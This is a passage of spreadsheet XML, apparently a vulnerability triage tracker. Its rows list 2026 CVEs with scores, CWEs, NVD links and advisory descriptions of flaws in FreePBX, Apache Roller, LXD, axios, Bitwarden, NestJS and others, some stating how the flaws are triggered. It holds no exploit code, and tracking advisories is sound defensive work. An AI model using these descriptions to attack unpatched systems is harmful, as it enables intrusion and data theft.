      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.4 and 17.0.6, the FreePBX Music on Hold (MoH) module contains a critical security flaw that allows authenticated attackers to execute arbitrary system commands with the privileges of the Asterisk service. Authentication with an existing FreePBX administrator account is required. The root cause lies in the fact that the module accepts a POST parameter that defines a custom Asterisk application, which is then stored in the database without any sanitization. Later, this data is written directly to the musiconhold_additional.conf configuration file without validation. Since Asterisk reads this configuration file and executes the specified application, an attacker can inject arbitrary commands that will be executed with Asterisk's permissions. This issue has been patched in versions 16.0.4 and 17.0.6.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45562</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82348</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key in Apache Roller 6.1.5 allows an authenticated user with authoring rights on one weblog to read, modify, or delete resources belonging to another weblog through unscoped identifier-based lookups. This affects multi-user installations where users are intended to be isolated between weblogs; no optional feature or non-default configuration is required. A user with administrator rights on their weblog can also overwrite another weblog's Velocity template, whose content is evaluated when the victim weblog renders. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which scopes authoring resource lookups to the acting weblog.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82348</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82376</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a user with entry-editing rights on a weblog to cause the server to parse an attacker-influenced trackback response with an XML parser that does not disable external entity resolution, leading to disclosure of files readable by the Roller process. The Trackback control is hidden in the standard UI, but its action remains directly reachable, and no non-default server configuration is required. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback response parser.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82376</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82379</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in Apache Roller 6.1.5 allows an attacker who captures a valid WSSE digest authentication header to replay it and gain the victim's AtomPub authority, because the authentication does not enforce nonce uniqueness or timestamp freshness. Only installations that enable the non-default AtomPub API with WSSE authentication and plaintext-compatible password storage are affected. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes WSSE as an AtomPub authentication method; existing installations configured for WSSE fail closed until an administrator explicitly selects a supported authentication method.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82379</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82386</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a weblog administrator to read files readable by the Roller process and reach internal network addresses by importing a crafted OPML document, because the bookmark import parser does not disable external entity resolution. No non-default configuration is required; the import is reached through the administrator bookmark-import action. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which uses a hardened parser that disables external entities and document type declarations.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82386</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82928</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-1242</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module contains a hardcoded SSH public key in /root/.ssh/authorized_keys, serving as a potential backdoor. The SSH daemon allows root login via key authentication and starts automatically. An attacker with the matching private key can gain a root shell on any affected device, resulting in full system compromise. The key cannot be removed without remounting the file system and survives a factory reset. Vendor notes that this functionality was used only for service purposes.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82928</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97335</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in the custom storage volume creation endpoint in Canonical LXD versions 5.0.0 and later (fixed in 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create custom volumes in a project to copy, and so read, any custom storage volume from any other project on the server, including its snapshots and configuration. The client does this with a crafted request that sets a source volume and source.project but omits source.type.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97335</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.2 until 1.20.0, the Node HTTP adapter in lib/adapters/http.js supplies request options without an own createConnection value. A separate same-process prototype-pollution flaw places a function on Object.prototype.createConnection. Node resolves and invokes the inherited createConnection socket factory, allowing the attacker-controlled function to select the transport endpoint. The attacker endpoint can receive request headers and bodies, including credentials, and return attacker-controlled responses while the URL appears legitimate. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55160</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>aws, requests</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Stringer is a self-hosted, anti-social RSS reader. Prior to commit 75cb095, an unrestricted Server-Side Request Forgery (SSRF) vulnerability allows any authenticated user to force the Stringer server to send arbitrary HTTP/HTTPS requests to internal networks, localhost services, and cloud metadata endpoints (e.g. AWS IMDS 169.254.169.254). When self-service signup is enabled (Setting::UserSignup), even a low-privileged registered user can exploit this to scan internal services or steal cloud IAM credentials. This issue has been patched via commit 75cb095.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55160</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100751</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via data-rlta-url attributes in Tabs &amp; Accordions (Pro) 2.3.0 - 3.1.0 - Tabs &amp; Accordions Pro accepts a url option for an item and writes it to a generated data-rlta-url attribute. The browser code passes that value to window.open() when the item is activated. Affected versions do not reject browser URL schemes which execute JavaScript. Joomla sees ordinary plugin syntax while filtering the authored article; Tabs &amp; Accordions creates the executable browser behavior later while rendering the article.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100751</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101878</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Bitwarden Server 2025.6.0 before 2026.5.0 declares the @ExternalId parameter of the User_ReadBySsoUserOrganizationIdExternalId stored procedure as NVARCHAR(50) while the column it queries stores NVARCHAR(300), silently truncating the SSO login identifier on SQL Server deployments and allowing a user whose identity-provider identifier begins with another organization member's full 50-character identifier to authenticate as that member and obtain a victim-scoped access token.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101878</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.19, 2.1.5, 3.0.7, and 5.0.10, crafted brace patterns can exhaust the native stack in parseCommaParts because parseCommaParts recursively processes the remainder once per brace group and uses push.apply to pass every element of a very large comma-part array as a function argument. Patterns containing many comma-separated brace groups trigger the recursive path, while the large array triggers the argument-array path without deep recursion. These paths cause recursive and argument-array native stack exhaustion before max or maxLength can limit output, potentially terminating the Node.js process in a process-terminating denial of service. This issue is fixed in versions 1.1.19, 2.1.5, 3.0.7, and 5.0.10.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.20, 2.1.6, 3.0.8, and 5.0.11, deeply nested brace groups cause expand_() to recurse once per nesting level at comma-member and single-set expansion sites, exhausting the native stack before output limits can apply and potentially terminating the Node.js process. expand_ performs uncontrolled recursion for nested brace alternatives and single-part sets. deeply nested brace groups supplied as an untrusted pattern. expand_ is affected. expand is affected. Comma members is affected. Single set is affected. native stack exhaustion during nested sub-expansion. process-terminating denial of service. This issue is fixed in versions 1.1.20, 2.1.6, 3.0.8, and 5.0.11.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Nest is a framework for building scalable Node.js server-side applications. Prior to 11.2.4 and 12.0.2, a single message with a deeply nested object in its pattern can terminate a NestJS microservice using the TCP or RabbitMQ transport. ServerTCP#handleMessage and ServerRMQ#handleMessage pass a client-controlled non-string pattern to JSON.stringify to derive the handler lookup key; sufficiently deep nesting throws RangeError: Maximum call stack size exceeded, and the unhandled promise rejection terminates Node.js under its default behavior. An attacker who can reach the TCP port or publish to the consumed RabbitMQ queue or exchange can crash the service on demand; other transports are not affected because their patterns arrive as strings. This issue is fixed in versions 11.2.4 and 12.0.2.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, getAuthContext does not distinguish authorized from unauthorized peer certificates when server credentials set requireClientCertificate to false. When applications use the returned authentication context, they can treat an unauthorized certificate as authorized, causing improper authentication. @grpc/grpc-js-xds can reach this condition when RBAC authentication is enabled in affected configurations. This issue is fixed in version 1.14.5 and 1.13.6.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102243</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>7.4</v>
      </c>
